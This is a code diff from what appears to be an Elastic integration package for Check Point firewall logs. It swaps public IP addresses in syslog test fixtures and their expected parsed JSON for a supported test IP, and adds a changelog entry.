2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36749"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"] -<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"] -<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"] <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47919"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"] <134>1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"Application Control"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"URL Filtering"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] -<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] +<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50024"; service:"137"; service_id:"nbname"; src:"192.168.1.196"] <134>1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60226"; service:"22"; service_id:"ssh"; src:"192.168.1.205"] diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml index f84cf47810d..305780f527d 100644 --- a/packages/checkpoint/changelog.yml +++ b/packages/checkpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log index afa04893969..276375258b4 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log @@ -1,2 +1,2 @@ <134>1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; time:"1594646954"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"1.1.1.1"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"1.1.1.1"] \ No newline at end of file +<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"81.2.69.144"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"81.2.69.144"] \ No newline at end of file diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json index bed2d1d35ce..c3f9b8014f7 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json @@ -54,7 +54,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.429050600Z", + "ingested": "2021-12-09T13:31:18.614546900Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; time:\"1594646954\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -75,41 +75,47 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 13335, + "number": 20712, "organization": { - "name": "Cloudflare, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "1.1.1.1" + "ip": "81.2.69.144" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 13335, + "number": 20712, "organization": { - "name": "Cloudflare, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 52780, - "ip": "1.1.1.1" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -135,14 +141,14 @@ }, "related": { "ip": [ - "1.1.1.1", - "1.1.1.1" + "81.2.69.144", + "81.2.69.144" ] }, "event": { "sequence": 62, - "ingested": "2021-06-30T09:24:17.429066800Z", - "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"1.1.1.1\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"1.1.1.1\"]", + "ingested": "2021-12-09T13:31:18.614555700Z", + "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"81.2.69.144\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"81.2.69.144\"]", "kind": "event", "action": "Drop", "id": "{0x60928f1d,0x8,0x40de101f,0xfcdbb197}", diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log index 9e86bccac9c..e659322e65b 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log @@ -1,20 +1,20 @@ <134>1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; product:"System Monitor"; sys_message::"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk"] <134>1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"2"; version:"5"; product:"System Monitor"; sys_message::"installed Standard"] <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46915"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"194.29.39.10"; 